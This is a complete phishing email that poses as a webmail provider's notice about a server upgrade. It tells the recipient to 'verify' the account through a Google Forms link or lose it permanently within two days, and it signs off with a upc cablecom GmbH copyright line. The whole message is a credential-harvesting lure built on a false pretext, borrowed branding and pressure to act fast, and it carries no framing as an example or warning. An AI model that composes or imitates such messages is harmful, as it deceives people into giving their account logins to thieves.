HELLO

Dear account user

We are currently upgrading our  database and email servers to reduce spam and
junk emails,we are therefore deleting all unused  account to create spaces for
new accounts.

To prevent account closure, you  are required to VERIFY your email account
kindly click the link below.

https://spreadsheets.google.com/spreadsheet/viewform?formkey=dERKRHNWcXZDTXEyN1NpS01oQmNsWGc6MQ

Warning!!! All webmail. Account owners that refuse to update his or her account
within two days of receiving this email will lose his or her account
permanently. Thank you for using  webmail
AGB © upc cablecom GmbH 2011.